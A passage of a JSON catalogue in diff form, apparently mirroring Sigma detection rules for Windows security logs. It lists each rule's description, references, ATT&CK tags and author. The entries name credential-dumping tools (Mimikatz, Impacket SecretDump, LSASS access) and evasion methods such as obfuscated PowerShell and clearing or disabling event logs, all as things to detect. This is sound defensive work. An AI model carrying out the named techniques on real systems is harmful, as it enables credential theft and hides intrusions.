"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dcom_iertutil_dll_hijack.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" - ], - "creation_date": "2020/10/12", - "filename": "win_security_dcom_iertutil_dll_hijack.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects Mimikatz DC sync security events", - "uuid": "611eab06-a145-4dfa-a295-3ccc5c20f59a", - "value": "Mimikatz DC Sync", - "meta": { - "refs": [ - "https://twitter.com/gentilkiwi/status/1003236624925413376", - "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2", - "https://blog.blacklanternsecurity.com/p/detecting-dcsync?s=r", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dcsync.yml" - ], - "tags": [ - "attack.credential_access", - "attack.s0002", - "attack.t1003.006" - ], - "creation_date": "2018/06/03", - "filename": "win_security_dcsync.yml", - "author": "Benjamin Delpy, Florian Roth, Scott Dermott, Sorina Ionescu", - "level": "high", - "falsepositive": [ - "Valid DC Sync that is not covered by the filters; please report", - "Local Domain Admin account used for Azure AD Connect" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects scenarios where an windows defender exclusion was added in registry where an entity would want to bypass antivirus scanning from windows defender", - "uuid": "e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", - "value": "Windows Defender Exclusion Set", - "meta": { - "refs": [ - "https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_defender_bypass.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2019/10/26", - "filename": "win_security_defender_bypass.yml", - "author": "@BarryShooshooga", - "level": "high", - "falsepositive": [ - "Intended inclusions by administrator" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects an installation of a device that is forbidden by the system policy", - "uuid": "c9eb55c3-b468-40ab-9089-db2862e42137", - "value": "Device Installation Blocked", - "meta": { - "refs": [ - "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6423", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_device_installation_blocked.yml" - ], - "tags": "No established tags", - "creation_date": "2022/10/14", - "filename": "win_security_device_installation_blocked.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC", - "uuid": "2111118f-7e46-4fc8-974a-59fd8ec95196", - "value": "DiagTrackEoP Default Login Username", - "meta": { - "refs": [ - "https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L46", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_diagtrack_eop_default_login_username.yml" - ], - "tags": [ - "attack.privilege_escalation" - ], - "creation_date": "2022/08/03", - "filename": "win_security_diagtrack_eop_default_login_username.yml", - "author": "Nasreddine Bencherchali", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects scenarios where system auditing (ie: windows event log auditing) is disabled.\nThis may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed.\nAlso, it is recommended to turn off \"Local Group Policy Object Processing\" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\".\nPlease note, that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications -- however it is recommended to perform these modifications in Active Directory anyways.\n", - "uuid": "69aeb277-f15f-4d2d-b32a-55e883609563", - "value": "Disabling Windows Event Auditing", - "meta": { - "refs": [ - "https://docs.google.com/presentation/d/1dkrldTTlN3La-OjWtkWJBb4hVk6vfsSMBFBERs6R8zA/edit", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_disable_event_logging.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.002" - ], - "creation_date": "2017/11/19", - "filename": "win_security_disable_event_logging.yml", - "author": "@neu5ron", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers", - "uuid": "4ac1f50b-3bd0-4968-902d-868b4647937e", - "value": "DPAPI Domain Backup Key Extraction", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-190620024610.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dpapi_domain_backupkey_extraction.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.004" - ], - "creation_date": "2019/06/20", - "filename": "win_security_dpapi_domain_backupkey_extraction.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects anyone attempting a backup for the DPAPI Master Key. This events gets generated at the source and not the Domain Controller.", - "uuid": "39a94fd1-8c9a-4ff6-bf22-c058762f8014", - "value": "DPAPI Domain Master Key Backup Attempt", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-190620024610.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dpapi_domain_masterkey_backup_attempt.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.004" - ], - "creation_date": "2019/08/10", - "filename": "win_security_dpapi_domain_masterkey_backup_attempt.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "uuid": "a4c90ea1-2634-4ca0-adbb-35eae169b6fc", - "value": "COMPlus_ETWEnabled Registry Modification", - "meta": { - "refs": [ - "https://twitter.com/_xpn_/status/1268712093928378368", - "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", - "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", - "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", - "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", - "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", - "https://bunnyinside.com/?term=f71e8cb9c76a", - "http://managed670.rssing.com/chan-5590147/all_p1.html", - "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_etw_modification.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2020/06/05", - "filename": "win_security_etw_modification.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Checks for event id 1102 which indicates the security event log was cleared.", - "uuid": "a122ac13-daf8-4175-83a2-72c387be339d", - "value": "Security Event Log Cleared", - "meta": { - "refs": [ - "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/SecurityEventLogCleared.yaml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_event_log_cleared.yml" - ], - "tags": [ - "attack.t1070.001" - ], - "creation_date": "2021/08/15", - "filename": "win_security_event_log_cleared.yml", - "author": "Saw Winn Naung", - "level": "medium", - "falsepositive": [ - "Legitimate administrative activity" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527", - "uuid": "8fe1c584-ee61-444b-be21-e9054b229694", - "value": "CVE-2021-1675 Print Spooler Exploitation IPC Access", - "meta": { - "refs": [ - "https://twitter.com/INIT_3/status/1410662463641731075", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_exploit_cve_2021_1675_printspooler_security.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569", - "cve.2021.1675", - "cve.2021.34527" - ], - "creation_date": "2021/07/02", - "filename": "win_security_exploit_cve_2021_1675_printspooler_security.yml", - "author": "INIT_6", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects external diskdrives or plugged in USB devices , EventID 6416 on windows 10 or later", - "uuid": "f69a87ea-955e-4fb4-adb2-bb9fd6685632", - "value": "External Disk Drive Or USB Storage Device", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_external_device.yml" - ], - "tags": [ - "attack.t1091", - "attack.t1200", - "attack.lateral_movement", - "attack.initial_access" - ], - "creation_date": "2019/11/20", - "filename": "win_security_external_device.yml", - "author": "Keith Wright", - "level": "low", - "falsepositive": [ - "Legitimate administrative activity" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects enumeration of the global catalog (that can be performed using BloodHound or others AD reconnaissance tools). Adjust Threshold according to domain width.", - "uuid": "619b020f-0fd7-4f23-87db-3f51ef837a34", - "value": "Enumeration via the Global Catalog", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5156", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_global_catalog_enumeration.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1087.002" - ], - "creation_date": "2020/05/11", - "filename": "win_security_global_catalog_enumeration.yml", - "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", - "level": "medium", - "falsepositive": [ - "Exclude known DCs." - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale", - "uuid": "a8f29a7b-b137-4446-80a0-b804272f3da2", - "value": "Persistence and Execution at Scale via GPO Scheduled Task", - "meta": { - "refs": [ - "https://twitter.com/menasec1/status/1106899890377052160", - "https://www.secureworks.com/blog/ransomware-as-a-distraction", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_gpo_scheduledtasks.yml" - ], - "tags": [ - "attack.persistence", - "attack.lateral_movement", - "attack.t1053.005" - ], - "creation_date": "2019/04/03", - "filename": "win_security_gpo_scheduledtasks.yml", - "author": "Samir Bousseaden", - "level": "high", - "falsepositive": [ - "If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of a local hidden user account which should not happen for event ID 4720.", - "uuid": "7b449a5e-1db5-4dd0-a2dc-4e3a67282538", - "value": "Hidden Local User Creation", - "meta": { - "refs": [ - "https://twitter.com/SBousseaden/status/1387743867663958021", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_hidden_user_creation.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1136.001" - ], - "creation_date": "2021/05/03", - "filename": "win_security_hidden_user_creation.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Rule to detect the Hybrid Connection Manager service installation.", - "uuid": "0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", - "value": "HybridConnectionManager Service Installation", - "meta": { - "refs": [ - "https://twitter.com/Cyb3rWard0g/status/1381642789369286662", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_hybridconnectionmgr_svc_installation.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1554" - ], - "creation_date": "2021/04/12", - "filename": "win_security_hybridconnectionmgr_svc_installation.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "high", - "falsepositive": [ - "Legitimate use of Hybrid Connection Manager via Azure function apps." - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of Impacket's psexec.py.", - "uuid": "32d56ea1-417f-44ff-822b-882873f5f43b", - "value": "Impacket PsExec Execution", - "meta": { - "refs": [ - "https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_impacket_psexec.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ], - "creation_date": "2020/12/14", - "filename": "win_security_impacket_psexec.yml", - "author": "Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detect AD credential dumping using impacket secretdump HKTL", - "uuid": "252902e3-5830-4cf6-bf21-c22083dfd5cf", - "value": "Possible Impacket SecretDump Remote Activity", - "meta": { - "refs": [ - "https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_impacket_secretdump.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.003" - ], - "creation_date": "2019/04/03", - "filename": "win_security_impacket_secretdump.yml", - "author": "Samir Bousseaden, wagga", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "uuid": "4edf51e1-cb83-4e1a-bc39-800e396068e3", - "value": "Invoke-Obfuscation CLIP+ Launcher - Security", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_clip_services_security.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/13", - "filename": "win_security_invoke_obfuscation_clip_services_security.yml", - "author": "Jonathan Cheong, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", - "uuid": "fd0f5778-d3cb-4c9a-9695-66759d04702a", - "value": "Invoke-Obfuscation Obfuscated IEX Invocation - Security", - "meta": { - "refs": [ - "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_obfuscated_iex_services_security.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027" - ], - "creation_date": "2019/11/08", - "filename": "win_security_invoke_obfuscation_obfuscated_iex_services_security.yml", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "uuid": "0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", - "value": "Invoke-Obfuscation STDIN+ Launcher - Security", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_stdin_services_security.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/15", - "filename": "win_security_invoke_obfuscation_stdin_services_security.yml", - "author": "Jonathan Cheong, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "uuid": "dcf2db1f-f091-425b-a821-c05875b8925a", - "value": "Invoke-Obfuscation VAR+ Launcher - Security", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_var_services_security.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/15", - "filename": "win_security_invoke_obfuscation_var_services_security.yml", - "author": "Jonathan Cheong, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "uuid": "7a922f1b-2635-4d6c-91ef-af228b198ad3", - "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - Security", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_compress_services_security.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/18", - "filename": "win_security_invoke_obfuscation_via_compress_services_security.yml", - "author": "Timur Zinniatullin, oscd.community", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "uuid": "f241cf1b-3a6b-4e1a-b4f9-133c00dd95ca", - "value": "Invoke-Obfuscation RUNDLL LAUNCHER - Security", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_rundll_services_security.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/18", - "filename": "win_security_invoke_obfuscation_via_rundll_services_security.yml", - "author": "Timur Zinniatullin, oscd.community", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "uuid": "80b708f3-d034-40e4-a6c8-d23b7a7db3d1", - "value": "Invoke-Obfuscation Via Stdin - Security", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_stdin_services_security.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/12", - "filename": "win_security_invoke_obfuscation_via_stdin_services_security.yml", - "author": "Nikita Nazarov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "uuid": "1a0a2ff1-611b-4dac-8216-8a7b47c618a6", - "value": "Invoke-Obfuscation Via Use Clip - Security", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_clip_services_security.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/09", - "filename": "win_security_invoke_obfuscation_via_use_clip_services_security.yml", - "author": "Nikita Nazarov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "uuid": "9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", - "value": "Invoke-Obfuscation Via Use MSHTA - Security", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_mshta_services_security.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/09", - "filename": "win_security_invoke_obfuscation_via_use_mshta_services_security.yml", - "author": "Nikita Nazarov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "uuid": "cd0f7229-d16f-42de-8fe3-fba365fbcb3a", - "value": "Invoke-Obfuscation Via Use Rundll32 - Security", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_rundll32_services_security.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/09", - "filename": "win_security_invoke_obfuscation_via_use_rundll32_services_security.yml", - "author": "Nikita Nazarov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "uuid": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", - "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_var_services_security.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/13", - "filename": "win_security_invoke_obfuscation_via_var_services_security.yml", - "author": "Timur Zinniatullin, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the mount of ISO images on an endpoint", - "uuid": "0248a7bc-8a9a-4cd8-a57e-3ae8e073a073", - "value": "ISO Image Mount", - "meta": { - "refs": [ - "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore", - "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages", - "https://twitter.com/MsftSecIntel/status/1257324139515269121", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_iso_mount.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1566.001" - ], - "creation_date": "2021/05/29", - "filename": "win_security_iso_mount.yml", - "author": "Syed Hasan (@syedhasan009)", - "level": "medium", - "falsepositive": [ - "Software installation ISO files" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", - "uuid": "52d8b0c6-53d6-439a-9e41-52ad442ad9ad", - "value": "First Time Seen Remote Named Pipe", - "meta": { - "refs": [ - "https://twitter.com/menasec1/status/1104489274387451904", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_lm_namedpipe.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ], - "creation_date": "2019/04/03", - "filename": "win_security_lm_namedpipe.yml", - "author": "Samir Bousseaden", - "level": "high", - "falsepositive": [ - "Update the excluded named pipe to filter out any newly observed legit named pipe" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "The attacker might use LOLBAS nltest.exe for discovery of domain controllers, domain trusts, parent domain and the current user permissions.", - "uuid": "eeb66bbb-3dde-4582-815a-584aee9fe6d1", - "value": "Correct Execution of Nltest.exe", - "meta": { - "refs": [ - "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/nltest.htm", - "https://attack.mitre.org/software/S0359/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_lolbas_execution_of_nltest.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1482", - "attack.t1018", - "attack.t1016" - ], - "creation_date": "2021/10/04", - "filename": "win_security_lolbas_execution_of_nltest.yml", - "author": "Arun Chauhan", - "level": "high", - "falsepositive": [ - "Red team activity", - "Rare legitimate use by an administrator" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects potential mimikatz-like tools accessing LSASS from non system account", - "uuid": "962fe167-e48d-4fd6-9974-11e5b9a5d6d1", - "value": "LSASS Access from Non System Account", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-170105221010.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_lsass_access_non_system_account.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2019/06/20", - "filename": "win_security_lsass_access_non_system_account.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects well-known credential dumping tools execution via service execution events", - "uuid": "f0d1feba-4344-4ca9-8121-a6c97bd6df52", - "value": "Credential Dumping Tools Service Execution - Security", - "meta": { - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_creddumper.yml" - ], - "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006", - "attack.t1569.002", - "attack.s0005" - ], - "creation_date": "2017/03/05", - "filename": "win_security_mal_creddumper.yml", - "author": "Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", - "level": "high", - "falsepositive": [ - "Legitimate Administrator using credential dumping tool for password recovery" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.", - "uuid": "cb062102-587e-4414-8efa-dbe3c7bf19c6", - "value": "Malicious Service Installations", - "meta": { - "refs": [ - "https://awakesecurity.com/blog/threat-hunting-for-paexec/", - "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html", - "https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_service_installs.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1003", - "car.2013-09-005", - "attack.t1543.003", - "attack.t1569.002" - ], - "creation_date": "2017/03/27", - "filename": "win_security_mal_service_installs.yml", - "author": "Florian Roth, Daniil Yugoslavskiy, oscd.community (update)", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host", - "uuid": "1de68c67-af5c-4097-9c85-fe5578e09e67", - "value": "WCE wceaux.dll Access", - "meta": { - "refs": [ - "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", - "https://jpcertcc.github.io/ToolAnalysisResultSheet", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_wceaux_dll.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.s0005" - ], - "creation_date": "2017/06/14", - "filename": "win_security_mal_wceaux_dll.yml", - "author": "Thomas Patzke", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Alerts on Metasploit host's authentications on the domain.", - "uuid": "72124974-a68b-4366-b990-d30e0b2a190d", - "value": "Metasploit SMB Authentication", - "meta": { - "refs": [ - "https://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/lib/rex/proto/smb/client.rb", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_metasploit_authentication.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ], - "creation_date": "2020/05/06", - "filename": "win_security_metasploit_authentication.yml", - "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", - "level": "high", - "falsepositive": [ - "Linux hostnames composed of 16 characters." - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation", - "uuid": "6fb63b40-e02a-403e-9ffd-3bcc1d749442", 